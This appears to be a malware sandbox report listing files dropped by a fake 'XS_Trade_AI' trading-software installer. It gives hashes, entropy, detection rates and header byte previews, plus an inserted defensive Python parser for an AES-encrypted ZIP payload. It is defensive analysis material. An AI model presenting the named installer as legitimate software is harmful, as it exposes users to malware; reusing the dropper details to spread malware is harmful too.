                                                                                                                                            SSDEEP:24576:1K738OQQcosQNRs54PK4ItIVwHLfVEhIESC/:1K738OfcosQNRs54PK4I7q
                                                                                                                                            MD5:A6277EDD815F1D33215C41309AA0A3B4
                                                                                                                                            SHA1:0522D880992F2BB46571E27610410A9D99B69984
                                                                                                                                            SHA-256:A6E24DEAB93CA92BB3118081E10987FB7078B0D249E38911BD0C429563941317
                                                                                                                                            SHA-512:AE83607B951996CC61BFC07AA6946BC8E6B409BC504AA92355C762420ECE2D69C2E11BB6C88D4CE81C8D0136AC82E1E04157ED02CDCA5B7D945D939D36C4AE39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!...#............_bootlocale.pyca.......C.O.o..v.....................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2265336
                                                                                                                                            Entropy (8bit):6.107347147299583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:Tzq7OrIUW5FPdtvxE8IRHKY1CPwDv3uFfJuJy:Xq7OzUdfE8AHKY1CPwDv3uFfJ/
                                                                                                                                            MD5:31C2130F39942AC41F99C77273969CD7
                                                                                                                                            SHA1:540EDCFCFA75D0769C94877B451F5D0133B1826C
                                                                                                                                            SHA-256:DD55258272EEB8F2B91A85082887463D0596E992614213730000B2DBC164BCAD
                                                                                                                                            SHA-512:CB4E0B90EA86076BD5C904B46F6389D0FD4AFFFE0BD3A903C7FF0338C542797063870498E674F86D58764CDBB73B444D1DF4B4AA64F69F99B224E86DDAF74BB5
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.w9g..jg..jg..jn..js..j5..ke..j5..kl..j5..km..j5..km..js..kl..jg..j...j1..k...j1..kf..j1..jf..j1..kf..jRichg..j........................PE..L.....'a...........!.................f.......0................................#......"...@..............................h....!.T.....!.|............t".......".........8...............................@.............!..............................text...9........................... ..`.rdata...(...0...*..................@..@.data...4Y...`!......B!.............@....idata........!......X!.............@..@.00cfg........!......r!.............@..@.rsrc...|.....!......t!.............@..@.reloc........"......|!.............@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29208
                                                                                                                                            Entropy (8bit):6.643623418348
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                            MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                            SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                            SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                            SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):544504
                                                                                                                                            Entropy (8bit):5.7541372304412945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:OcwAbgOL9BmDy2pMcdmka42bJ8Hh9sa3MU2lvzJp:O4UOBBcF2b0hma8U2lvzJp
                                                                                                                                            MD5:8471E73A5594C8FBBB3A8B3DF4FB7372
                                                                                                                                            SHA1:488772CB5BBB50F14A4A9546051EDEF4AE75DD20
                                                                                                                                            SHA-256:380BB2C4CE42DD1EF77C33086CF95AA4FE50290A30849A3E77A18900141AF793
                                                                                                                                            SHA-512:24025B8F0CC076A6656EBA288F5850847C75F8581C9C3E36273350DB475050DEEE903D034AD130D56D1DEDE20C0D33B56B567C2EF72EB518F76D887F9254B11B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............^..^..^..E^..^..._..^..._..^..._..^..._..^..._..^..._..^..^9..^..._...^..._..^..)^..^..._..^Rich..^................PE..L...,.'a...........!.........4.......".......................................p...........@.........................`,...N........... ..s............2.......0...6......8...............................@............................................text...y........................... ..`.rdata..jj.......l..................@..@.data....;.......6...p..............@....idata...A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..$>...0...@..................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):180968
                                                                                                                                            Entropy (8bit):6.670082335019216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:lGGzH3PDa4Wa0hDVgoApEmP/JZR8x4Hm6EJNA3Rui/IddZaUTlI8BhNjV:xzH24Wa01AEa/JZVGDNA3Rui/AaUTbjV
                                                                                                                                            MD5:46C68BBCA8A86EA6AD9B0279DED140D4
                                                                                                                                            SHA1:1FA89E41A77C5BD30799B28BBE7B2FF6FCE5183A
                                                                                                                                            SHA-256:00DF0F266070208D7087D203F5FD06E91C47C9D5C8ED449690B9443F06C8D992
                                                                                                                                            SHA-512:E75E082FBFF3FA9B9848CA5693DE0D4C5074995F9E03EEDD26FC72C90FBD9D60E257E6ECE93F2A113C6DF6401930451DF462FD8D16D14E0D249A8BEB2055D0CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.....,...-...,...)...,...(...,.../...,.X.-...,...-...,...-...,.X.$...,.X.,...,.X.....,.X.....,.Rich..,.........PE..L...u:-a...........!................E........ ............................................@..........................j..P...0k...................................$..(f..T............................f..@............ ...............................text............................... ..`.rdata...W... ...X..................@..@.data...h............j..............@....rsrc................v..............@..@.reloc...$.......&..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4497640
                                                                                                                                            Entropy (8bit):6.725954872872607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:6UqQgnAHhsvhRLEmgRJEqdaNIuEBIv0BX+dCIqQKHaEMZnFPqYekTr+4mP6umenF:oaWhxKCqBI2O9qTHrMZ0Yu1P7n3zFX
                                                                                                                                            MD5:5BAFE23107E6DF19DE8F7AC9068ED26E
                                                                                                                                            SHA1:D2A88BEAF959BD5331948B03330C98FE8FA85C7C
                                                                                                                                            SHA-256:C1E5A847AE6AA9D9F42B482C7A20DCDC9DFE225F7186B0B01924225AA4E5E581
                                                                                                                                            SHA-512:1C2372DEBC0E2E53EA281798F15243294430E4E7E4D3B82E4AB998A1B7C77CAD68D50E196E37C6FF7BA83B08A12286AF5D2797BFA707AF5DAD180862CCE7EFC7
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................x................q...................Rich...........PE..L...J:-a...........!......)...........).......)..............................pF.....?<E...@...........................?.......?.|.....C...............D.......C.0.....>.T.............................>.@.............)..............................text....).......)................. ..`.rdata...6....)..8....).............@..@.data.........@.......?.............@....rsrc.........C.......A.............@..@.reloc..0.....C.......A.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25320
                                                                                                                                            Entropy (8bit):6.533727727613444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
                                                                                                                                            MD5:E03B622ACBA9D02DC5A10364824EDE8C
                                                                                                                                            SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
                                                                                                                                            SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
                                                                                                                                            SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y..y..y......y...x..y...|..y...}..y...z..y.h.x..y...x..y..x...y.h.q..y.h.y..y.h...y.h.{..y.Rich.y.................PE..L...r:-a...........!.........&...............0.......................................9....@......................... ;..L...l;..x....`...............F.......p......d6..T............................6..@............0...............................text............................... ..`.rdata..6....0......."..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1115880
                                                                                                                                            Entropy (8bit):5.387181050869946
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
                                                                                                                                            MD5:FED3EC3AE0C349D65C0E90025B5507E6
                                                                                                                                            SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
                                                                                                                                            SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
                                                                                                                                            SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.eb.f.1.f.1.f.1...1.f.1S..0.f.1S..0.f.1S..0.f.1S..0.f.1...0.f.1...0.f.1.f.1Ff.1...0.f.1...0.f.1...1.f.1...0.f.1Rich.f.1........PE..L...r:-a...........!.....H...........F.......`......................................e.....@.............................X...8...........................................T...........................p...@............`..4............................text...KF.......H.................. ..`.rdata..b~...`.......L..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530696
                                                                                                                                            Entropy (8bit):6.855729200155896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:yHYkjGzb5GB95kZ+E8iKjwNxxNgaifafGuy+BYeA1fYSWCyXHgL74LisvJc7c8MB:UHjEv9BaL+ilYSUwLUvvJcI8MpX4PQlR
                                                                                                                                            MD5:8D0EEBD8F9083EE140B42321C1DC6FE5
                                                                                                                                            SHA1:E0260AD414DDEA10CB35F73E1B2F957A86AFBC39
                                                                                                                                            SHA-256:A3B964BE72190820662C59ACE07C39B75D0DB587EEAD01E87E5D43DDF6CDA51E
                                                                                                                                            SHA-512:B6B6E492F5F140DD6FF421944A8C4B75AC0743720192C4B1E7ACE0F0F38A5A9D2766C5A22C13B2BCFAE018EF29E0A0CBEB6BCA25F8CAC6DC944CDBD064B1A3CF
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{....................o...............................................Rich....................PE..d....L.g..........#...........................@..............................................................................................O..,.......0....P...E.......)...........................................................0...............................text............................... ..`.rdata...I...0...J... ..............@..@.data...h........&...j..............@....pdata...E...P...F..................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):237568
                                                                                                                                            Entropy (8bit):6.42067568634536
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:dnSx3lws+iWbUmJmE8dxMw7r+mjT5PbzEFwyGIyTcHY10tSB9j:IP0bUmQEUr+mRcbTx4N
                                                                                                                                            MD5:55C310C0319260D798757557AB3BF636
                                                                                                                                            SHA1:0892EB7ED31D8BB20A56C6835990749011A2D8DE
                                                                                                                                            SHA-256:54E7E0AD32A22B775131A6288F083ED3286A9A436941377FC20F85DD9AD983ED
                                                                                                                                            SHA-512:E0082109737097658677D7963CBF28D412DCA3FA8F5812C2567E53849336CE45EBAE2C0430DF74BFE16C0F3EEBB46961BC1A10F32CA7947692A900162128AE57
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)Wj.H99.H99.H99..D9.H99..W9.H99..T9-H99zGd9.H99.H894H99..K9.H99..C9.H99..E9.H99..A9.H99Rich.H99........................PE..L......W...........!................Nr..............................................0............................... ;......h/..d.......................................................................@............................................text...i........................... ..`.rdata...n.......p..................@..@.data....:...@... ...@..............@....rsrc................`..............@..@.reloc..b-.......0...p..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2530816
                                                                                                                                            Entropy (8bit):6.381531670528971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5fFRLtC2Y0SUQYZ4oVrbFoWmBOns67BeY:5tRLtHVr9mBz6
                                                                                                                                            MD5:797B09E2DCF988B4320DDCDD4CB936F0
                                                                                                                                            SHA1:9FFD65FFB2F1E890160A5377C71FD6E5B46C8EA3
                                                                                                                                            SHA-256:1A93F3E99AFAE583E7AD643C3A0850E7136CF727C6DEAD288F482214837F9B4C
                                                                                                                                            SHA-512:F3EE399D6F53C99CDA2FC058E3F1635CDFD6DFF778B92BF140B102CDB78461AEBB3060FFDB9B2481F6FE53B8B150FD2E83C5A1D4854CB1A0CC3B65FBE0A070AA
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...=.a\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...0&..D................................................... &.....................D.%.@.....%......................text...P.$.......$................. ..`.itext...&....$..(....$............. ..`.data...$Z....$..\....$.............@....bss.....q...0%..........................idata...5....%..6....%.............@....didata.......%......L%.............@....edata........&......V%.............@..@.tls....D.....&..........................rdata..].... &......X%.............@..@.rsrc....D...0&..D...Z%.............@..@..............'.......&.............@..@........................................................
                                                                                                                                            Process:C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2530816
                                                                                                                                            Entropy (8bit):6.381531670528971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5fFRLtC2Y0SUQYZ4oVrbFoWmBOns67BeY:5tRLtHVr9mBz6
                                                                                                                                            MD5:797B09E2DCF988B4320DDCDD4CB936F0
                                                                                                                                            SHA1:9FFD65FFB2F1E890160A5377C71FD6E5B46C8EA3
                                                                                                                                            SHA-256:1A93F3E99AFAE583E7AD643C3A0850E7136CF727C6DEAD288F482214837F9B4C
                                                                                                                                            SHA-512:F3EE399D6F53C99CDA2FC058E3F1635CDFD6DFF778B92BF140B102CDB78461AEBB3060FFDB9B2481F6FE53B8B150FD2E83C5A1D4854CB1A0CC3B65FBE0A070AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...=.a\..................$...........$.......$...@...........................'...........@......@....................&.......%..5...0&..D................................................... &.....................D.%.@.....%......................text...P.$.......$................. ..`.itext...&....$..(....$............. ..`.data...$Z....$..\....$.............@....bss.....q...0%..........................idata...5....%..6....%.............@....didata.......%......L%.............@....edata........&......V%.............@..@.tls....D.....&..........................rdata..].... &......X%.............@..@.rsrc....D...0&..D...Z%.............@..@..............'.......&.............@..@........................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):530696
                                                                                                                                            Entropy (8bit):6.855729200155896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:yHYkjGzb5GB95kZ+E8iKjwNxxNgaifafGuy+BYeA1fYSWCyXHgL74LisvJc7c8MB:UHjEv9BaL+ilYSUwLUvvJcI8MpX4PQlR
                                                                                                                                            MD5:8D0EEBD8F9083EE140B42321C1DC6FE5
                                                                                                                                            SHA1:E0260AD414DDEA10CB35F73E1B2F957A86AFBC39
                                                                                                                                            SHA-256:A3B964BE72190820662C59ACE07C39B75D0DB587EEAD01E87E5D43DDF6CDA51E
                                                                                                                                            SHA-512:B6B6E492F5F140DD6FF421944A8C4B75AC0743720192C4B1E7ACE0F0F38A5A9D2766C5A22C13B2BCFAE018EF29E0A0CBEB6BCA25F8CAC6DC944CDBD064B1A3CF
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{....................o...............................................Rich....................PE..d....L.g..........#...........................@..............................................................................................O..,.......0....P...E.......)...........................................................0...............................text............................... ..`.rdata...I...0...J... ..............@..@.data...h........&...j..............@....pdata...E...P...F..................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7108996
                                                                                                                                            Entropy (8bit):7.9999745140648875
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:196608:Oz9B4c63TsMQ074VDumTF3U9I2wICUVUdewV87G7F:OJBhslxMDNtIORqg87kF
                                                                                                                                            MD5:AC1A1590A3314BBC85E1DF5EFA33B060
                                                                                                                                            SHA1:9D8FF07D2417B4318ECDFB099C82E1A0EA6CDD5B
                                                                                                                                            SHA-256:8B10C5EE19274CC7CE7B85B8A7ACA8F8D1AEDB5031A08F7053412298AEC5D927
                                                                                                                                            SHA-512:A66ECAC1949F25460FE3FCAEE8A2511475DD61B753474B9B75CFFAF9B817FA7E6D52EA918F6104379BA48639B38E99B44846291885AE873F435268EC1FE34F20
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..3...c...[Y.....xl...o.....yyttrsu.exe......AE...v>..|.~2.Vz9...S.7...:&.....M.%..D......j..................._.B..t../.3./...,.Ot.k..|...6.5..:<..GJ.....a.~.V...c.W........... S..~HH..A`oX.`:.y.W....%...S...0...._.....3........nn...r.O=|..3..D/D...7...4.8._.k/+"..xC..........w*.W........\x.=.Vfh...:......t.....i..6..;X.E9t.)...JL....j6HM...j...'.lU..e>/WK9.4.E..l.S.72.z05..lEe..#.~.`.....Sjk.....1.L.......P._....d..zX...Y.H?.z........C.p...K.N.h....Q..\.e..85..!.G...C6s.JA.]`...hX.(F...4|ij...t......(.[.l.....44.A}.fW.*......1&......w9.d..2..o..Q.Z[#..PS9..-.0..#.~..s.....-.....O......0.o...~Gh....4....G...X.....}......n#.4x..<..<...;o...r.)8|].[.3..V]92.....w..c....Z........f.'..Ml...]2.Q....o....!.k..'v].@.,.X+..~o.$.-.2Kgra.......X}#....a...b.Pz<.L"..P..C.*......B..[.b....48..eM.g:.*=H.......l)..f.r.y.+.'.8.i%.y.v...K.....p..9.fI.T..7!\jB;..|.d..]].~...".7.wc.q;;..F.o.!....Y..JUW4?JUK..-."...(..3.V{R-k.2...<.....u.aL...Z...Z...?..A...y.
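The entry above is the one file in this set the report marks Encrypted:true: libmagic reads the local file header as "at least v5.1 to extract, compression method=AES Encrypted", the entropy is 7.99997 bits per byte, and the preview itself carries the decodable fields in order: "PK.." (signature), "3." (version needed 0x33 = 51, i.e. 5.1), "c." (method 0x63 = 99, the WinZip AE-x marker), an 11-byte file name "yyttrsu.exe", and the 0x9901 extra record with the "AE" vendor ID. The following is an added example, not part of the Joe Sandbox report: a Python parser for that header that reports the encryption flag, the AES record (key size and the real compression method hidden behind method 99) and the entropy of the member's stored bytes. The test input is a constructed header carrying the same layout and file name; it is not the dropped archive, and no password or payload from the sample is involved.

```python
import math
import struct

METHOD_AES = 99          # WinZip AE-x: the real compression method lives in the 0x9901 extra record
EXTRA_AES = 0x9901
GP_ENCRYPTED = 0x0001    # general-purpose flag bit 0
LOCAL_SIG = b"PK\x03\x04"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_local_header(data: bytes) -> dict:
    """Decode the ZIP local file header at data[0] and any AES extra record behind it."""
    if data[:4] != LOCAL_SIG:
        raise ValueError("not a ZIP local file header")
    (version, flags, method, _mtime, _mdate, _crc, csize, usize,
     fnlen, exlen) = struct.unpack_from("<HHHHHIIIHH", data, 4)     # fixed part is 30 bytes
    name = data[30:30 + fnlen].decode("cp437", "replace")
    extra = data[30 + fnlen:30 + fnlen + exlen]
    info = {
        "version_needed": f"{version // 10}.{version % 10}",
        "encrypted": bool(flags & GP_ENCRYPTED),
        "method": method,
        "name": name,
        "compressed_size": csize,
        "uncompressed_size": usize,
        "data_offset": 30 + fnlen + exlen,
        "aes": None,
    }
    off = 0                                   # extra field: records of id(2) size(2) payload
    while off + 4 <= len(extra):
        eid, esz = struct.unpack_from("<HH", extra, off)
        body = extra[off + 4:off + 4 + esz]
        if eid == EXTRA_AES and len(body) >= 7:
            ae_version, vendor, strength, real_method = struct.unpack("<H2sBH", body[:7])
            info["aes"] = {
                "ae_version": ae_version,
                "vendor": vendor.decode("ascii", "replace"),
                "key_bits": {1: 128, 2: 192, 3: 256}.get(strength, strength),
                "actual_method": real_method,
            }
        off += 4 + esz
    return info


def triage_zip(data: bytes) -> dict:
    """Header fields plus the entropy of the first member's stored bytes."""
    info = parse_local_header(data)
    start, size = info["data_offset"], info["compressed_size"]
    info["payload_entropy"] = round(shannon_entropy(data[start:start + size]), 4)
    info["password_protected"] = info["encrypted"]
    return info


def build_aes_local_header(name: str, payload: bytes, key_bits: int = 256) -> bytes:
    """Constructed test input: an AE-2 local header plus an opaque payload (not a real archive).

    AE-2 stores a zero CRC, so the CRC field below is legitimately 0.
    """
    strength = {128: 1, 192: 2, 256: 3}[key_bits]
    extra = struct.pack("<HHH2sBH", EXTRA_AES, 7, 2, b"AE", strength, 8)   # 8 = deflate underneath
    header = struct.pack("<4sHHHHHIIIHH", LOCAL_SIG, 51, GP_ENCRYPTED, METHOD_AES,
                         0, 0, 0, len(payload), len(payload), len(name), len(extra))
    return header + name.encode("cp437") + extra + payload


if __name__ == "__main__":
    sample = build_aes_local_header("yyttrsu.exe", bytes(range(256)) * 8)
    print(triage_zip(sample))
```

Method 99 on its own only says "AE-x"; the key size and the compression actually applied come from the extra record, which is why the parser walks it instead of stopping at the method field. On the real archive the entropy would be computed over the 7108996 stored bytes; a value this close to 8.0 is what AES-encrypted (or well-compressed) content looks like, so the number alone does not separate the two, the header flag does.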
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6144
                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
